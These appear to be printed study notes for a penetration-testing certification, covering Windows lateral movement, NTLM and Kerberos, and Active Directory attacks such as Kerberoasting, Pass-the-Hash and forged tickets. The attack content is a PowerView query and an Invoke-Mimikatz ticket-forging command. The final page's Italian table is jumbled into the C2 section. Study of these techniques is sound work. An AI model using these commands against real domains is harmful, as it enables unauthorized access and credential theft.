troubleshoot, and execute scripts.

💡 WinRm, RDP, WMI, SMB

[Link] 47/77
15/04/2025 11:45 eCPPT Certification

Authenticated Remote Code Execution

Remote execution techniques for lateral movement involve running commands or
code on a remote system, allowing attackers to move laterally across a network.

[Link] 48/77
15/04/2025 11:45 eCPPT Certification

Technique Description Tools

Remote Desktop Protocol - RDP RDP allows a user to xfreerdp
remotely connect to Metasploit
a Windows system RDP brute force
with a graphical user tools.
interface. Attackers
can use
compromised
credentials or brute
force to gain access.
Windows Management WMI is a framework PowerShell
Instrumentation - WMI for managing and Impacket
monitoring Windows ([Link])
systems. Metasploit modules
It allows remote
execution of
commands and
scripts.
PowerShell Remoting PowerShell provides PowerShell (Invoke-
capabilities for Command, Enter-
remote PSSession)
administration and Metasploit
scripting. PowerShell Empire
remoting allows
execution of
commands on
remote systems.
PsExec and Similar Tools PsExec and similar PsExec
tools (like [Link] Impacket ([Link])
from Impacket) allow CrackMapExec
remote execution
over SMB by
creating a service on
the target system to
run commands.

Lateral Movement PsExec

Authenticated Windows lateral movement via SMB with PsExec refers to the
process of using valid credentials to move laterally across a Windows network by
remotely executing code on other systems via Server Message Block (SMB).

[Link] 49/77
15/04/2025 11:45 eCPPT Certification

📌 PsExec
It is a utility from the Sysinternal Suite that allows administrator to
execute commands on remote systems.

How it Works?
1. Connection Over SMB
PsExec establishes a connection to a remote system using SMB.
It typically requires credentials for authentication, either as plaintext
password or NTLM hashes
2. Named Pipe
PsExec creates a named pipe on the remote system to facilitate
communication between the local PsExec client and the remote service.
3. Temporary Service
To execute commands on the remote system, PsExec creates a temporary
Windows Service. This service run with Elevated Privileges, allowing it to
execute commands or scripts as Administrator.
4. Execution and Cleanup
Once the command or script is executed, PsExec cleans up by removing the
temporary service.

[Link] 50/77
15/04/2025 11:45 eCPPT Certification

⚠️ DISCALAIMER
To authenticate via SMB and execute commands with PsExec, the user
account must have appropriate permissions.

Administrative Privileges
PsExec typically requires administrative privileges to function properly.
This means that the user account used to authenticate over SMB must
have the rights to:
• Create and start a service on the remote system.
• Access the IPC$ share, which is used to establish the SMB
connection.
• Read and write to certain directories or system areas.
• Local Users and Domain Users: PsExec can use both local and
domain-based accounts to authenticate over SMB. In domain
environments, users with administrative rights in Active Directory
may have broader access to remote systems.

SMB
SMB is a network file sharing protocol that is used to facilitate the sharing of files
and peripherals between computers on a local network.

📌 SMB uses port 445 (TCP)

SMB ran on top of NetBios using port 139

SMB protocol utilize 2 level of authentication:

1. User Authentication: Users must provide a username and password in order
to authenticate with the SMS server in order to access a share
2. Share Authentication: Users must provide a password in order to access
restricted share

NTLM Authentication
NTLM is a legacy authentication protocol.

[Link] 51/77
15/04/2025 11:45 eCPPT Certification

Although it has been largely replaced by Kerberos in domain-based

environments, NTLM is still used in various contexts, especially in environments
with older systems or in specific use cases where Kerberos is not feasible.

How it Works?
NTLM authentication operates using a challenge-response mechanism.
1. Connection Request
A client, such as a Windows system or an application, initiates a connection to
an SMB server.
2. Server Challenge
The SMB server responds with an NTLM challenge. This challenge is a random
value used to ensure that the authentication process involves a unique
component for each sessions.
3. Client Response
The client calculates a response to the server's challenge. This calculation
involves encrypting the challenge using the NTLM hash derived from the
user's password.
This process ensures that the client has access to the correct NTLM hash
without transmitting the plaintext password.

📌 2 Type of NTLM
• NTLMv1: Uses a DES-based mechanism to generate the
response.
It has been deprecated due to security weaknesses.
• NTLMv2: More secure, involving a combination of the server's
challenge and a client challenge (a unique value generated by
the client), providing additional security against replay attacks

[Link] 52/77
15/04/2025 11:45 eCPPT Certification

4. Server Verification
The server verifies the client’s response by comparing it to the expected
response, derived from its stored NTLM hashes.

SMB Authentication via PsExec

In order to utilize PsExec to gain access to a Windows target, we will need to
identify legitimate user accounts and their respective passwords or password
hashes.
Tool used Impacket
[Link] in Impacket
This script in Impacket mimics the functionality of PsExec, allowing remote
execution of command on Windows systems.
• SMB Connection: [Link] establishes a connection to the remote system
using
• SMB. It uses valid credentials (plaintext or hashed) to authenticate.
• Creating a Named Pipe: Once connected, the script creates a named pipe to
communicate with the remote system.
• Installing a Service: It installs a temporary service on the remote system to
execute the desired command.

[Link] 53/77
15/04/2025 11:45 eCPPT Certification

• Executing Commands: The service executes the provided command or script,

returning the output via the named pipe.
• Cleaning Up: After

Metodology
1. Obtain Credentials
Attackers acquire valid credentials through methods like credential dumping,
phishing, or other means. These credentials may be plaintext passwords or
NTLM hashes.
2. Establish SMB Connection
Using PsExec, the attacker establishes a connection to the target system over
SMB. This typically involves providing a username and password, or NTLM
hash.
3. Remote Command Execution
PsExec creates a named pipe on the target system to communicate with the
PsExec client

DEMO: Aucun accès

Lateral Movement With SMBExec

SMBExec is a tool used for remote command execution on Windows System over
the SMB protocol
It is designed to allow administrator (or attacker) to execute commands on
remote Windows machines, typically with administrative privileges.

📌 Does not create a Temporary Service

Unlike PsExec, which creates a temporary Windows service to execute
commands, SMBexec operates differently, often using Windows
Management Instrumentation (WMI) or similar methods to achieve
remote execution without creating additional services.

[Link] 54/77
15/04/2025 11:45 eCPPT Certification

DEMO: Aucun accès

Lateral Movement With CrackMapExec

CrackMapExec (CME) is a powerful open-source penetration testing tool
designed for Ethical Hackers.

💡 Used to enumerate and assess network and has extensive capabilities

for network reconnaissance, lateral movement, and remote exploitation.

Use Cases:
• Network Enumeration and Reconnaissance: CME can scan networks to
identify hosts, enumerate shares, and gather other valuable information.
• Credential Testing and Brute Forcing: CME can test credentials against
network resources, checking for weak or reused passwords. This can
help penetration testers identify potential vulnerabilities.
• Lateral Movement: Using various techniques, CME can move laterally
across a network, exploiting valid credentials, hashes, or Kerberos
tickets.
• Privilege Escalation: CME can attempt to escalate privileges on remote
systems, providing deeper access to resources
• Remote Command Execution: CME can execute commands on remote
systems over SMB, WMI, or other protocols, allowing for flexible remote
management.

DEMO: Aucun accès

Lateral Movement via RDP

DEMO: Aucun accès

Lateral Movement via WinRM

Windows Remote Management (WinRM) is a Windows remote management
protocol that can be used to facilitate remote access with Windows systems over
HTTP/HTTPS.

[Link] 55/77
15/04/2025 11:45 eCPPT Certification

💡 Work on port TCP 5985 and HTTPS 598

WinRm used for:

○ Remotely access and interact with Windows hosts on a local network.
○ Remotely access and execute commands on Windows systems.
○ Manage and configure Windows systems remotely.

WinRM authentication involves verifying the identity of a client attempting to

connect to a WinRM service on a Windows System.

Privileges
To access Windows Remote Management (WinRM), a user account requires
certain privileges and permissions. The specific privileges depend on what
operations the user is expected to perform with WinRM and whether the
environment is configured to restrict access to certain groups or users.
By default, WinRm is configured to allow access to users who belong to the local
Administrator.

💡 Tools
• Evil-WinRM: tool designed for interacting with WinRM service on
remote Windows systems. Used to execute command, transferring
files, and gather information.
• CrackMapExec: can execute PowerShell commands or scripts on
remote systems via WinRM.
• PowerShell Remoting: allows you to run PowerShell commands or
scripts on remote computers

Penetretation test Administrative Task

Evil-WinRM Use PowerShell Remotin
CrackMapExec

DEMO: Aucun accès

[Link] 56/77
15/04/2025 11:45 eCPPT Certification

Pass-the-Hash (PtH)
Pass-the-Hash is a technique used in lateral movement attacks where an attacker
uses a hashed version of a password to authenticate without needing the
plaintext password.
Pass-the-Hash allows attackers to impersonate users, gain unauthorized access,
and move laterally across a network.

How it works?
Step Description Tools
Obtaining Hashes Attackers acquire NTLM hashes Mimikatz
through Hashcat
Metasploit
Using NTLM hashes for Once the attacker has an NTLM
authentication hash, they can use it to
authenticate without needing
the plaintext password.
Connecting to Remote Attackers can use the NTLM CrackMapExec
Systems hash to establish connections PsExec
with remote systems. Impacket
Common methods include
using SMB, RDP, WMI
Lateral Movement Using Pass-the-Hash, attackers
can move laterally across a
network, connecting to other
systems and performing various
tasks, such as remote command
execution, data exfiltration, or
privilege escalation.

DEMO: Aucun accès

Pass-the-Hash With WMIExec

WMI allows administrator to perform various task like:
• Gathering system information
• Executing scripts
• Controlling system operations

[Link] 57/77
15/04/2025 11:45 eCPPT Certification

⚠️ Work on port 135 TCP

Dynamic RPC Ports: After connecting to port 135, the communication is
redirected to a dynamically assigned RPC port. These dynamic ports
typically fall within the range of 49152–65535, though this range can be
customized through Group Policy or registry settings

WMIExec is a technique used to execute commands or scripts on remote

Windows systems via WMI
In the context of lateral movement, wmiexec provides a way for attackers or
penetration testers to interact with remote systems without requiring additional
services or software installations

How it works?
WMI: is a framework that allows interaction with system components and
management of various tasks on Windows systems.
DCOM and RPC: WMI operates over Distributed Component Object Model
(DCOM) and Remote Procedure Call (RPC), allowing remote communication with
Windows systems
Remote Command Execution: wmiexec uses WMI to remotely execute
commands or scripts on a target system. It does so by sending a WMI request to
execute a command, and then retrieves the output from the remote system.

Lateral Movement with WMIExec

Remote Command Execution
wmiexec allows execution of commands on remote systems, providing a method
to interact with and manipulate the target system
Privilege Escalation
wmiexec can be used to execute commands with elevated privileges, potentially
allowing attackers to escalate their access rights on the remote system.
Minimal Footprint
wmiexec does not require additional software installations or creating new
services. This minimal footprint makes it less detectable and can bypass certain
security controls. The ability to execute commands without leaving extensive
traces makes it attractive for lateral movement.

[Link] 58/77
15/04/2025 11:45 eCPPT Certification

Tools
• Impacket
• CrackMapExec
• Custom Scripts
DEMO: Aucun accès

DEMO: Aucun accès

DEMO: Aucun accès

SSH Tunneling
SSH tunneling, also known as SSH port forwarding, is a technique that uses
Secure Shell (SSH) to create encrypted tunnels for network traffic.

💡 It allows users to securely forward data through an SSH connection

SSH tunneling, in the context of pivoting, refers to a technique used to create

secure tunnels through Secure Shell (SSH) connections that allow attackers or
penetration testers to access other systems or network segments.

SSH Tunneling Techniques

Local Port Forwarding: Local port forwarding redirects traffic from a local port
on the client system to a specified port on the remote system. This allow to
create secure tunnels to internal resources

💡 In case of pivoting: local porta forwarding can be used to connect to

internal services on a compromised system

Remote Port Forwarding: Remote port forwarding allows traffic from a port on
the remote system to be forwarded to a specified port on the local system.
This technique is useful for enabling remote access or establishing backdoors

💡 In case of pivoting: Remote port forwarding can be used to create a

tunnel that allows remote systems to connect to internal resources via a
compromised system.

[Link] 59/77
15/04/2025 11:45 eCPPT Certification

Dynamic Port Forwarding: Dynamic port forwarding creates a SOCKS proxy,

allowing flexible port forwarding based on client requests. This is useful for
tunneling various types of traffic through the SSH connection

💡 In case of pivoting: Dynamic port forwarding can be used to create a

SOCKS proxy, enabling flexible tunneling

DEMO: Aucun accès

DEMO: Aucun accès
DEMO: Aucun accès

[Link] 60/77
15/04/2025 11:45 eCPPT Certification

Active Directory Penetration Testing

Active Directory
Active Directory (AD) is a directory service developed by Microsoft for Windows
domain network.

💡 It serves as a centralized repository for managing and organizing

information about network resource like users, computer, groups etc…

Use Cases
• User Authentication and Authorization: AD serves as a central
authentication and authorization mechanism.
Example: Users can log into their computer using AD credentials.
• Resource Management: It enables administrators to efficiently manage and
organize network resource like computer, printers, shared folder and
application.
• Group Policy Management: AD allows administrators to define and enforce
security policies, configuration and settings across all domain-joined devices
• Directory Services: It provides a hierarchical structure for organizing objects
within the network, making it easier to locate and manage resources
• Domains: A domain is a logical grouping of network objects that share a
common directory database and security policies
• Domain Controller (DCs): Domain Controllers are servers that manage
access to the resources within a domain. They store a replica of the Active
Directory database and authenticate user logins, enforce security policies,
and replicate changes to other domain controllers within the domain.
• Organizational Units: OU are containers within a domain that allow
administrators to organize and manage object more effectively
• Forest: A forest is a collection of one or more domains that share a common
schema, configuration and global catalog.
• Global Catalog (GC): GC is a distributed data repository that contains a
partial replica of all object in the forest. It facilitates cross-domain searches
and enables users to locate resources across the entire Active Directory
forest.

[Link] 61/77
15/04/2025 11:45 eCPPT Certification

• Trust Relationship: Trust relationships define how authentication and

authorization are extended between domains within a forest or between
separate forests.

Users, Groups & Computers

Users represent individuals who interact with the network. Each user has a unique
account within Active Directory, identified by a username and associated with a
password.

☝ Administrators can manage user accounts by creating, modifying, or

deleting them using Active Directory management tools.
They can also assign permissions, group memberships, and other
settings to control user access to network resources.

Groups are collections of user accounts, computer accounts or other group in

AD.
There are two main types of groups in AD:
• Security Groups: Security groups are used to manage access permissions to
network resources. Users can be added to security groups, and permissions
can be assigned to these groups to control resource access.

Security Group Azure AD

[Link] 62/77
15/04/2025 11:45 eCPPT Certification

• Distribution Groups: Distribution groups are used for sending email

messages to a group of recipients. They do not have security-related
permissions and are primarily used for email distribution purposes.

Computer represent physical or virtual devices that are joined to the Active
Directory domain. This includes workstations, servers, laptops, and other network
devices.

DEMO (not lab): Aucun accès

Organization Units
OUs are containers within an AD domain used to organize and manage object
such as user account, computer account, groups and other OUs.
Differenze between OUs & Security Group

OU Security Group
OUs are used for organizing and Security Groups are used for access
managing objects within Active control and permissions
Directory management.
OUs create a hierarchical structure Security Groups can be organized
for organizing objects, in a flat structure
OUs are containers for objects Security Groups are collections of
within Active Directory and can users, computers, or other groups
contain other OUs,

DEMO (not lab): Aucun accès

[Link] 63/77
15/04/2025 11:45 eCPPT Certification

Active Directory Authentication

Active Directory authentication is the process by which users and computers
verify their identities to gain access to network resources within an AD domain
Authentication protocols are:

[Link] 64/77
15/04/2025 11:45 eCPPT Certification

• Kerberos: is the primary authentication protocol used by AD for

authentication
How it works?
◦ When a user attempts to log in, their client computer requests a Ticket
Granting Ticket (TGT) from the Key Distribution Centre (KDC), which is
typically a domain controller.
◦ Then the DC verifies the user’s credentials and issues a TGT if
authentication is successful
◦ Then the TGT is then used to obtain Service Tickets to accessing specific
network resource
Features:
◦ Mutual Authentication: both the client and the server verify each other’s
identities
◦ SSO: Users authenticate once and can access mutiple resource without
re-entering credentials
◦ Ticket-based: authentication exchanges rely on encrypted tickets
reducing the risk of credential theft.

Kerberos authentication

KERBEROS DELEGATION

[Link] 65/77
15/04/2025 11:45 eCPPT Certification

• NTLM: is an older authentication protocol used by Windows systems for

backward compatibility
How it works?
◦ When a user attempt to log in, their client computer sends a hashed
version of their password to the server
◦ The server compares the hash to the stored hash of the user’s password
◦ If the hashes match, authentication is successful
Features:
◦ Compatibility: NTLM is supported by older Windows systems and
applications.
◦ Simplicity: NTLM authentication does not require the complexity of
Kerberos, making it easier to implement in certain environments.
◦ Security: NTLM has security limitations compared to Kerberos, including
susceptibility to pass-the-hash attacks and lack of mutual authentication.

[Link] 66/77
15/04/2025 11:45 eCPPT Certification

Trees, Forests & Trusts

[Link] 67/77
15/04/2025 11:45 eCPPT Certification

Forest

[Link] 68/77
15/04/2025 11:45 eCPPT Certification

trust forest

AD Penetration Testing Methodology

Active Directory (AD) penetration testing is a security assessment process aimed
at evaluating the security posture of an organization's Active Directory
infrastructure.

[Link] 69/77
15/04/2025 11:45 eCPPT Certification

Killchain

Methodology

[Link] 70/77
15/04/2025 11:45 eCPPT Certification

Techniques
Breaching AD - Password Spray
- Brute Force Attack
- Phishing
- Poisoning
AD Enumeration - PowerView: AD objects, attributes, and permissions
- BloodHound: Visualize and analyze AD permissions, group
memberships, and attack paths
- LDAP Enumeration: Query the AD LDAP service to retrieve detailed
information about users, groups, computers, and OUs
Privilege Escalation - Kerberoasting: Kerberoasting is a Kerberos attack that targets service accounts
to obtain their encrypted service account passwords
- AS-REP Roasting: AS-REP roasting is a Kerberos authentication attack
that targets user accounts with the "Do not require Kerberos
preauthentication" attribute set
Lateral Movement - Pass-the-Hash: Use stolen password hashes to authenticate and gain access to
other systems without knowing the plaintext passwords.
- Pass-the-ticket (PtT) is a technique used in Active Directory
environments to authenticate to other systems or services using stolen Kerberos
ticket-granting tickets (TGTs) or service tickets without knowing the user's
plaintext password.
Persistence - Silver Ticket: A Silver Ticket attack is a technique used in Active Directory (AD)
environments to impersonate any service or computer account by forging
Kerberos service tickets without the need to obtain the account's plaintext
password.
- Golden Ticket: Golden ticket attacks involve forging Kerberos tickets for
arbitrary users, allowing attackers to impersonate any user and access any
resource within the AD environment.

💡 Important references
ocd-mindmaps Welcome to Orange Cyberdefense mindmaps

Password Spray
Password spraying is an attack technique in which an adversary attempts to
compromise user accounts by trying to authenticate with a curated list of
passwords that are either frequently used or likely to be used by their target.

[Link] 71/77
15/04/2025 11:45 eCPPT Certification

DEMO: Aucun accès

AD Enumeration: BloodHound
Active Directory (AD) reconnaissance is a crucial step in assessing the security of
an Active Directory environment.

BloodHound is a powerful tool for conducting such reconnaissance activity.

BloodHound uses graph theory to reveal the hidden and often unintended
relationships within an Active Directory or Azure environment.

💡 Attackers can use BloodHound to easily identify highly complex attack

paths that would otherwise be impossible to quickly identify. Defenders
can use BloodHound to identify and eliminate those same attack paths.
Both blue and red teams can use BloodHound to easily gain a deeper
understanding of privilege relationships in an Active Directory or Azure
environment.

DEMO: Aucun accès

AD Enumeration: PowerView
DEMO: Aucun accès

AS-REP Roasting - Privilege Escalation

AS-REP Roasting is a technique used to exploit a weakness in the Kerberos
authentication protocol.
In the Kerberos protocol, when a user wants to authenticate to a service, they
send an Authentication Service Request - AS-REQ to the KDC. The Key
Distributing Center then responds with an Authentication Service Reply - AS-REP,
which includes a ticket-granting - TGT.

[Link] 72/77
15/04/2025 11:45 eCPPT Certification

💡 AS-REP Roasting takes advantage of the fact that some user accounts in
Active Directory may have the "Do not require Kerberos
preauthentication" option enabled.

Hunting for user with those privilege:

Get-DomainUser | Where-Object { $_.UserAccountControl -like

"*DONT_REQ_PREAUTH*"}

Tool: Rubeus

DEMO: Aucun accès

Kerberoasting
Kerberoasting is a post-exploitation attack technique that attempts to obtain a
password hash of an Active Directory account that has a Service Principal Name
(“SPN”).

💡 The retrieved Kerberos ticket is encrypted with the hash of the service
account password affiliated with the SPN.
(An SPN is an attribute that ties a service to a user account within the
AD).
The adversary then works offline to crack the password hash, often
using brute force techniques.

Once the plaintext credentials of the service account are obtained, the
adversary can impersonate the account owner and inherit access to any
systems, assets or networks granted to the compromised account.

How it works?
1. A threat actor compromises the account of a Domain User.
2. The threat actor uses the Domain User context to request a Kerberos service
ticket from the ticket granting service (TGS) using tools like GhostPack’s
Rubeus or SecureAuth Corporation’s [Link].

[Link] 73/77
15/04/2025 11:45 eCPPT Certification

3. The threat actor receives a ticket from the Kerberos key distribution center
(KDC). The ticket is encrypted with a hashed version of the account’s
password.
4. The threat actor captures the TGS ticket and takes it offline.
5. The threat actor attempts to crack the SPN credential hash to obtain the
service account’s plaintext password using brute force techniques or tools
like Hashcat or JohnTheRipper.
6. With the service account password in hand, the threat actor attempts to
authenticate as the service account and is granted access to any service,
network or system associated with the compromised account.
7. The attacker is then able to steal data, escalate privileges or set backdoors on
the network to ensure future access.

🧱 How to prevent?
• Complex: Comprised of 25 or more characters
• Random: Do not contain any recognizable words, phrases or
patterns
• Changed frequently: Rotated every 30 days or less
• Use MFA
• Integrate IAM - Identity Access Management
Use BloodHound to identify all privileged service account.

DEMO: Aucun accès

AD Lateral Movement: Pass-the-Hash - PtH

Pass-the-Hash attack is a credential theft technique primarily targeting
Windows-based system. In this attack, an attacker obtains the hashed password
of a user and uses it to authenticate that user, bypassing the need for the actual
plain-text password.

[Link] 74/77
15/04/2025 11:45 eCPPT Certification

It start, typically, with unauthorized access to a compromised system where the

target user’s hashed password is stored.
Once the hash is acquired, the attacker can exploit weaknesses in the Windows
authentication protocol, such as NTLM or Kerberos, to pass the hashed
credentials to other system within the AD domain.
DEMO: Aucun accès

AD Lateral Movement: Pass-the-Ticket - PtT

Pass the Ticket is a credential theft technique that enables adversaries to use
stolen Kerberos tickets to authenticate to resources (e.g., file shares and other
computers) as a user without having to compromise that user’s password.
Adversaries often use this technique to move laterally through an organization’s
network to hunt for opportunities to escalate their privileges or fulfil their
mission.
Both ticket-granting service (TGS) tickets and ticket-granting tickets (TGT) can be
stolen and reused by adversaries. Without administrative privileges, an adversary
can obtain the TGT (using “fake delegation”) and all TGS tickets for the current
user.
DEMO: Aucun accès

AD Persistence: Silver Ticket

Silver Ticket attack involves the creation of a valid TGS for a specific service when
the password hash of the service is obtained.
This allows unauthorized access to the service by forging a customized TGS.
Adversaries capable of forging Silver tickets can create and use TGS tickets
without interacting with the Key Distribution Center (KDC), potentially making
detection more challenging

[Link] 75/77
15/04/2025 11:45 eCPPT Certification

Invoke-Mimikatz -Command '"kerberos::golden

/domain:[Link] /sid:S-1-5-21-1693200156-3137632808-
1858025440 /target:[Link] /service:CIFS
/rc4:d5f92467d4425e5f34fb55893e8a7768 /user:administrator /ptt"' ##
/domain = the FQDN of the Domain ## /sid = the SID of the domain ##
/target = the FQDN of the target server ## /service = the target
service name ## /rc4 = the NTLM/RC4 password hash ## /user = the
username to impersonate (can be fake too)

DEMO: Aucun accès

AD Persistence: Golden Ticket

Golden Ticket Attack is a malicious cybersecurity attack in which a threat actor
attempts to gain almost unlimited access to an organization’s domain by
accessing user data stored in Microsoft Active Directory (AD).
It exploits weaknesses in the Kerberos identity authentication protocol, which is
used to access the AD, allowing an attacker to bypass normal authentication.
DEMO: Aucun accès

💡 Summary table of Active Directory

Exploitation
Scarred Monk Active Directory Fundamentals (Part 1)- Basic Concepts

[Link] 76/77
15/04/2025 11:45 eCPPT Certification

Technique Brief Description Misconfiguration

AS-REP E’ una tecnica di attacco utilizzata per ottenere le Flag = “Do not require Kerberos preauthenticat
Roasting credenziali di un account utente in ambienti Active
Directory sfruttando una configurazione debole nel Senza questa protezione, il server KDC (Key Dis
protocollo Kerberos. Center) invia direttamente un AS-REP (Authent
Service Response) all’utente senza richiedere la
autenticazione.
Command & Control (C2/C&C)
Command and Control (C2) refers to the communication structure used by the
attackers to remotely control and coordinate activities across compromised
systems.

💡 C2 enable attackers to send commands, receive data, and manage their

operations in a coordinated manner.

C2 frameworks allow red teams to orchestrate, control and coordinate

multi-stage offensive operations, providing them with the tools to
mimic real-world threat actors.

Kerberoasti E’ una tecnica di attacco molto utilizzata in ambienti L’attacco sfrutta il fatto che i ticket di servizio -
Role
ng of C2 Active Directory che sfrutta il protocollo Kerberos emessi per gli account di servizio sotto forma d
per ottenere le credenziali di servizio da un account
Centralized Coordination: C2 frameworks provide a centralized point from
• di servizio (SPN) con privilegi elevati.
which red teams can manage multiple compromised systems.
• Persistence and Remote Access: C2 allows red teams to establish and
maintain persistence on compromised systems. It enables remote access,
allowing red teams to interact with target system, execute commands and
carry out post-exploitation activities.
• Lateral Movement: C2 frameworks facilitate lateral movement across a
network.
• Complex Attack Scenarios: C2 frameworks empower red teams to execute
complex attack scenarios that span multiple stages.
• Testing Blue Team Detection and Response: C2 frameworks are instrumental

[Link] 77/77